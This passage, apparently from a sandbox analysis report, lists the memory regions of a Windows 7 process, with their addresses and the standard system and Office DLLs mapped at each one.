0x6e2d0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1285 start_va = 0x6e2e0000 end_va = 0x6e368fff entry_point = 0x6e2e0000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 1286 start_va = 0x6e4d0000 end_va = 0x6e4d3fff entry_point = 0x6e4d0000 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 1287 start_va = 0x6e4e0000 end_va = 0x6e50ffff entry_point = 0x6e4e0000 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 1288 start_va = 0x6e510000 end_va = 0x6e541fff entry_point = 0x6e510000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1289 start_va = 0x6e670000 end_va = 0x6e807fff entry_point = 0x6e670000 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 1290 start_va = 0x6e810000 end_va = 0x6e825fff entry_point = 0x6e810000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 1291 start_va = 0x6ea40000 end_va = 0x6ea97fff entry_point = 0x6ea40000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 1292 start_va = 0x6eaa0000 end_va = 0x6eac9fff entry_point = 0x6eaa0000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 1293 start_va = 0x6eb70000 end_va = 0x6eb76fff entry_point = 0x6eb70000 region_type = mapped_file name = "msiltcfg.dll" filename = "\\Windows\\System32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll") Region: id = 1294 start_va = 0x6eb80000 end_va = 0x6ebe0fff entry_point = 0x6eb80000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1295 start_va = 0x6ebf0000 end_va = 0x6ee67fff entry_point = 0x6ebf0000 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 1296 start_va = 0x6ee70000 end_va = 0x6ee78fff entry_point = 0x6ee70000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 1297 start_va = 0x6ee80000 end_va = 0x6eeadfff entry_point = 0x6ee80000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 1298 start_va = 0x6eed0000 end_va = 0x6ef20fff entry_point = 0x6eed0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1299 start_va = 0x6f020000 end_va = 0x6f06dfff entry_point = 0x6f020000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1300 start_va = 0x6f070000 end_va = 0x6f0e7fff entry_point = 0x6f070000 region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 1301 start_va = 0x6f0f0000 end_va = 0x6f18ffff entry_point = 0x6f0f0000 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 1302 start_va = 0x6f530000 end_va = 0x6f589fff entry_point = 0x6f530000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1303 start_va = 0x6fe00000 end_va = 0x6fe05fff entry_point = 0x6fe00000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 1304 start_va = 0x6fe10000 end_va = 0x6fe7ffff entry_point = 0x6fe10000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 1305 start_va = 0x6fe80000 end_va = 0x6fe8afff entry_point = 0x6fe80000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1306 start_va = 0x6fe90000 end_va = 0x6fe98fff entry_point = 0x6fe90000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 1307 start_va = 0x6fea0000 end_va = 0x6ff09fff entry_point = 0x6fea0000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 1308 start_va = 0x6ff10000 end_va = 0x6ff40fff entry_point = 0x6ff10000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 1309 start_va = 0x6ff50000 end_va = 0x707c7fff entry_point = 0x6ff50000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office15\\1033\\GrooveIntlResource.dll" (normalized: "c:\\progra~1\\micros~1\\office15\\1033\\grooveintlresource.dll") Region: id = 1310 start_va = 0x707d0000 end_va = 0x70ccffff entry_point = 0x707d0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf") Region: id = 1311 start_va = 0x70cd0000 end_va = 0x70f0ffff entry_point = 0x70cd0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1312 start_va = 0x70f10000 end_va = 0x70f35fff entry_point = 0x70f10000 region_type = mapped_file name = "atl100.dll" filename = "\\Windows\\System32\\atl100.dll" (normalized: "c:\\windows\\system32\\atl100.dll") Region: id = 1313 start_va = 0x70f40000 end_va = 0x70fa8fff entry_point = 0x70f40000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Windows\\System32\\msvcp100.dll" (normalized: "c:\\windows\\system32\\msvcp100.dll") Region: id = 1314 start_va = 0x70fb0000 end_va = 0x7106efff entry_point = 0x70fb0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 1315 start_va = 0x71070000 end_va = 0x71216fff entry_point = 0x71070000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office15\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~1\\office15\\grooveex.dll") Region: id = 1316 start_va = 0x71220000 end_va = 0x7126bfff entry_point = 0x71220000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1317 start_va = 0x71270000 end_va = 0x713defff entry_point = 0x71270000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 1318 start_va = 0x71ba0000 end_va = 0x71bcdfff entry_point = 0x71ba0000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 1319 start_va = 0x72320000 end_va = 0x72402fff entry_point = 0x72320000 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 1320 start_va = 0x72410000 end_va = 0x72449fff entry_point = 0x72410000 region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 1321 start_va = 0x72450000 end_va = 0x72521fff entry_point = 0x72450000 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 1322 start_va = 0x72530000 end_va = 0x7255afff entry_point = 0x72530000 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 1323 start_va = 0x72560000 end_va = 0x725aefff entry_point = 0x72560000 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 1324 start_va = 0x725b0000 end_va = 0x72613fff entry_point = 0x725b0000 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 1325 start_va = 0x72620000 end_va = 0x726d9fff entry_point = 0x72620000 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 1326 start_va = 0x726e0000 end_va = 0x7271bfff entry_point = 0x726e0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1327 start_va = 0x72720000 end_va = 0x727cffff entry_point = 0x72720000 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 1328 start_va = 0x727d0000 end_va = 0x7281cfff entry_point = 0x727d0000 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 1329 start_va = 0x72820000 end_va = 0x72844fff entry_point = 0x72820000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1330 start_va = 0x72850000 end_va = 0x7287dfff entry_point = 0x72850000 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 1331 start_va = 0x72880000 end_va = 0x728c7fff entry_point = 0x72880000 region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 1332 start_va = 0x728d0000 end_va = 0x728e5fff entry_point = 0x728d0000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1333 start_va = 0x728f0000 end_va = 0x728f9fff entry_point = 0x728f0000 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1334 start_va = 0x72900000 end_va = 0x72905fff entry_point = 0x72900000 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 1335 start_va = 0x72ae0000 end_va = 0x72af6fff entry_point = 0x72ae0000 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 1336 start_va = 0x72b00000 end_va = 0x72cadfff entry_point = 0x72b00000 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 1337 start_va = 0x72cb0000 end_va = 0x72cdafff entry_point = 0x72cb0000 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 1338 start_va = 0x72ce0000 end_va = 0x72cfcfff entry_point = 0x72ce0000 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 1339 start_va = 0x72d00000 end_va = 0x72f64fff entry_point = 0x72d00000 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1340 start_va = 0x72f70000 end_va = 0x72fd3fff entry_point = 0x72f70000 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 1341 start_va = 0x72fe0000 end_va = 0x73043fff entry_point = 0x72fe0000 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 1342 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1343 start_va = 0x73270000 end_va = 0x7327cfff entry_point = 0x73270000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1344 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1345 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1346 start_va = 0x73410000 end_va = 0x73456fff entry_point = 0x73410000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1347 start_va = 0x73460000 end_va = 0x73469fff entry_point = 0x73460000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1348 start_va = 0x73490000 end_va = 0x734a3fff entry_point = 0x73490000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1349 start_va = 0x734e0000 end_va = 0x734effff entry_point = 0x734e0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1350 start_va = 0x735d0000 end_va = 0x7364cfff entry_point = 0x735d0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1351 start_va = 0x73730000 end_va = 0x73736fff entry_point = 0x73730000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1352 start_va = 0x73740000 end_va = 0x73764fff entry_point = 0x73740000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1353 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1354 start_va = 0x73830000 end_va = 0x7383dfff entry_point = 0x73830000 region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 1355 start_va = 0x73840000 end_va = 0x73847fff entry_point = 0x73840000 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 1356 start_va = 0x73850000 end_va = 0x73906fff entry_point = 0x73850000 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 1357 start_va = 0x73910000 end_va = 0x73949fff entry_point = 0x73910000 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 1358 start_va = 0x73950000 end_va = 0x7395efff entry_point = 0x73950000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1359 start_va = 0x73960000 end_va = 0x7396efff entry_point = 0x73960000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1360 start_va = 0x73970000 end_va = 0x73978fff entry_point = 0x73970000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1361 start_va = 0x739a0000 end_va = 0x739affff entry_point = 0x739a0000 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 1362 start_va = 0x739b0000 end_va = 0x73a43fff entry_point = 0x739b0000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 1363 start_va = 0x73a80000 end_va = 0x73a8cfff entry_point = 0x73a80000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1364 start_va = 0x73aa0000 end_va = 0x73b9afff entry_point = 0x73aa0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1365 start_va = 0x73ba0000 end_va = 0x73bcefff entry_point = 0x73ba0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1366 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1367 start_va = 0x73bf0000 end_va = 0x73c28fff entry_point = 0x73bf0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1368 start_va = 0x73c30000 end_va = 0x73c38fff entry_point = 0x73c30000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1369 start_va = 0x73c40000 end_va = 0x73c77fff entry_point = 0x73c40000 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 1370 start_va = 0x73c80000 end_va = 0x73caefff entry_point = 0x73c80000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 1371 start_va = 0x73cb0000 end_va = 0x73d61fff entry_point = 0x73cb0000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 1372 start_va = 0x73d70000 end_va = 0x73efffff entry_point = 0x73d70000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 1373 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1374 start_va = 0x73f40000 end_va = 0x74034fff entry_point = 0x73f40000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1375 start_va = 0x74040000 end_va = 0x74051fff entry_point = 0x74040000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1376 start_va = 0x74060000 end_va = 0x7407dfff entry_point = 0x74060000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1377 start_va = 0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1378 start_va = 0x74220000 end_va = 0x74317fff entry_point = 0x74220000 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 1379 start_va = 0x74320000 end_va = 0x744d6fff entry_point = 0x74320000 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 1380 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1381 start_va = 0x74750000 end_va = 0x74766fff entry_point = 0x74750000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1382 start_va = 0x74840000 end_va = 0x74847fff entry_point = 0x74840000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1383 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1384 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1385 start_va = 0x74d30000 end_va = 0x74d71fff entry_point = 0x74d30000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1386 start_va = 0x74f40000 end_va = 0x74f58fff entry_point = 0x74f40000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1387 start_va = 0x74fb0000 end_va = 0x74fb7fff entry_point = 0x74fb0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1388 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1389 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1390 start_va = 0x75000000 end_va = 0x7505efff entry_point = 0x75000000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1391 start_va = 0x75060000 end_va = 0x75088fff entry_point = 0x75060000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1392 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1393 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1394 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1395 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1396 start_va = 0x75240000 end_va = 0x75251fff entry_point = 0x75240000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1397 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1398 start_va = 0x75340000 end_va = 0x7536cfff entry_point = 0x75340000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1399 start_va = 0x75370000 end_va = 0x75396fff entry_point = 0x75370000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1400 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1401 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1402 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1403 start_va = 0x75610000 end_va = 0x7580afff entry_point = 0x75610000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1404 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1405 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1406 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1407 start_va = 0x76490000 end_va = 0x765c5fff entry_point = 0x76490000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1408 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1409 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1410 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1411 